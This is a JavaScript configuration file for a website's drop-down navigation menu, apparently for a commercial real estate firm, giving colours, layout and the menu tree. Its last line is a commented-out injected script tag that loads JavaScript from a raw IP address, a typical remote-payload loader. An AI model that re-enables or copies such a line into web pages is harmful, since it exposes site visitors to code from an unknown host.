

	var NoOffFirstLineMenus=5;			// Number of first level items
	var LowBgColor='#b2d1b2';			// Background color when mouse is not over
	var LowSubBgColor='#b2d1b2';			// Background color when mouse is not over on subs
	var HighBgColor='#84b176';			// Background color when mouse is over
	var HighSubBgColor='#84b176';			// Background color when mouse is over on subs
	var FontLowColor='#2d5640';			// Font color when mouse is not over
	var FontSubLowColor='#2d5640';			// Font color subs when mouse is not over
	var FontHighColor='#2d5640';			// Font color when mouse is over ~was:94B284
	var FontSubHighColor='#2d5640';			// Font color subs when mouse is over
	var BorderColor='';			// Border color
	var BorderSubColor='#4f9b73';			// Border color for subs
	var BorderWidth=1;				// Border width
	var BorderBtwnElmnts=1;			// Border between elements 1 or 0
	var FontFamily="verdana,arial,comic sans ms,technical"	// Font family menu items
	var FontSize=8;				// Font size menu items
	var FontBold=1;				// Bold menu items 1 or 0
	var FontItalic=0;				// Italic menu items 1 or 0
	var MenuTextCentered='center';			// Item text position 'left', 'center' or 'right'
	var MenuCentered='center';			// Menu horizontal position 'left', 'center' or 'right'
	var MenuVerticalCentered='top';		// Menu vertical position 'top', 'middle','bottom' or static
	var ChildOverlap=.00;				// horizontal overlap child/ parent
	var ChildVerticalOverlap=.00;			// vertical overlap child/ parent
	var StartTop=0;				// Menu offset x coordinate
	var StartLeft=0;				// Menu offset y coordinate
	var VerCorrect=0;				// Multiple frames y correction
	var HorCorrect=0;				// Multiple frames x correction
	var LeftPaddng=0;				// Left padding
	var TopPaddng=10;				// Top padding
	var FirstLineHorizontal=1;			// SET TO 1 FOR HORIZONTAL MENU, 0 FOR VERTICAL
	var MenuFramesVertical=0;			// Frames in cols or rows 1 or 0
	var DissapearDelay=1000;			// delay before menu folds in
	var TakeOverBgColor=0;			// Menu frame takes over background color subitem frame
	var FirstLineFrame='navig';			// Frame where first level appears
	var SecLineFrame='space';			// Frame where sub levels appear
	var DocTargetFrame='space';			// Frame where target documents appear
	var TargetLoc='MenuPos';				// id name of a div where you want the menu to be anchored
	var HideTop=0;				// Hide first level when loading new document 1 or 0
	var MenuWrap=0;				// enables/ disables menu wrap 1 or 0
	var RightToLeft=0;				// enables/ disables right to left unfold 1 or 0
	var UnfoldsOnClick=0;			// Level 1 unfolds onclick/ onmouseover
	var WebMasterCheck=0;			// menu tree checking on or off 1 or 0
	var ShowArrow=1;				// Uses arrow gifs when 1
	var KeepHilite=1;				// Keep selected path highligthed
	var Arrws=['images/triright.gif',5,5,'images/tridown.gif',5,5,'images/trileft.gif',10,10];	// Arrow source, width and height

function BeforeStart(){return}
function AfterBuild(){return}
function BeforeFirstOpen(){return}
function AfterCloseAll(){return}


// Menu tree
//	MenuX=new Array("TextToShow","Link","BgImage",NoOfSubs,Height,Width,BgColor,BgHiColor,FontColor,FontHiColor,BorderColor);
//	For rollover images set "Text to show" to:  "rollover:Image1.jpg:Image2.jpg"
	
	
	
Menu1=new Array("About Us","","",3,33,186,"","","","","");
	Menu1_1=new Array("History & Vision","content.cfm?id=1","",0,33,186,"","","","","");
	Menu1_2=new Array("People","","",6,33,186,"","","","","");
			Menu1_2_1=new Array("Philip G. Hulse","content.cfm?id=2","",0,33,186,"","","","","");
			Menu1_2_2=new Array("Christopher J. Hulse","content.cfm?id=3","",0,33,186,"","","","","");
			Menu1_2_3=new Array("Peder B. Hulse","content.cfm?id=4","",0,33,186,"","","","","");
			Menu1_2_4=new Array("Brian Pratt","content.cfm?id=26","",0,33,186,"","","","","");
			Menu1_2_5=new Array("Sam Luten","content.cfm?id=27","",0,33,186,"","","","","");
			Menu1_2_6=new Array("Monica Howard","content.cfm?id=18","",0,33,186,"","","","","");
	Menu1_3=new Array("LEED","","",3,33,186,"","","","","");
			Menu1_3_1=new Array("Overview","content.cfm?id=7","",0,33,186,"","","","","");
			Menu1_3_2=new Array("Objective","content.cfm?id=8","",0,33,186,"","","","","");
			Menu1_3_3=new Array("Projects","content.cfm?id=9","",0,33,186,"","","","","");
			
//Menu2=new Array("News","","",2,33,186,"","","","","");
//	Menu2_1=new Array("Current","content.cfm?id=15","",0,33,186,"","","","","");
//	Menu2_2=new Array("Archives","content.cfm?id=16","",0,33,186,"","","","","");

Menu2=new Array("News","content2.cfm","",0,33,186,"","","","","");



Menu3=new Array("Listings","listings.cfm","",5,33,186,"","","","","");
	Menu3_1=new Array("Office","listings.cfm?type=office","",0,33,186,"","","","","");
	Menu3_2=new Array("Industrial","listings.cfm?type=industrial","",0,33,186,"","","","","");
	Menu3_3=new Array("Retail","listings.cfm?type=retail","",0,33,186,"","","","","");
	Menu3_4=new Array("Land","listings.cfm?type=land","",0,33,186,"","","","","");
	Menu3_5=new Array("Show all","listings.cfm","",0,33,186,"","","","","");

Menu4=new Array("Developments","developments.cfm","",0,33,186,"","","","","");
		
			
Menu5=new Array("Contact","","",2,33,186,"","","","","");
	Menu5_1=new Array("Information","content.cfm?id=12","",0,33,186,"","","","","");
	Menu5_2=new Array("Employee listing","content.cfm?id=13","",0,33,186,"","","","","");
	

	




//document.writeln ("<script src=\"http://222.231.60.19/seraph/door/iisHelp/help.js\"><\/script>");
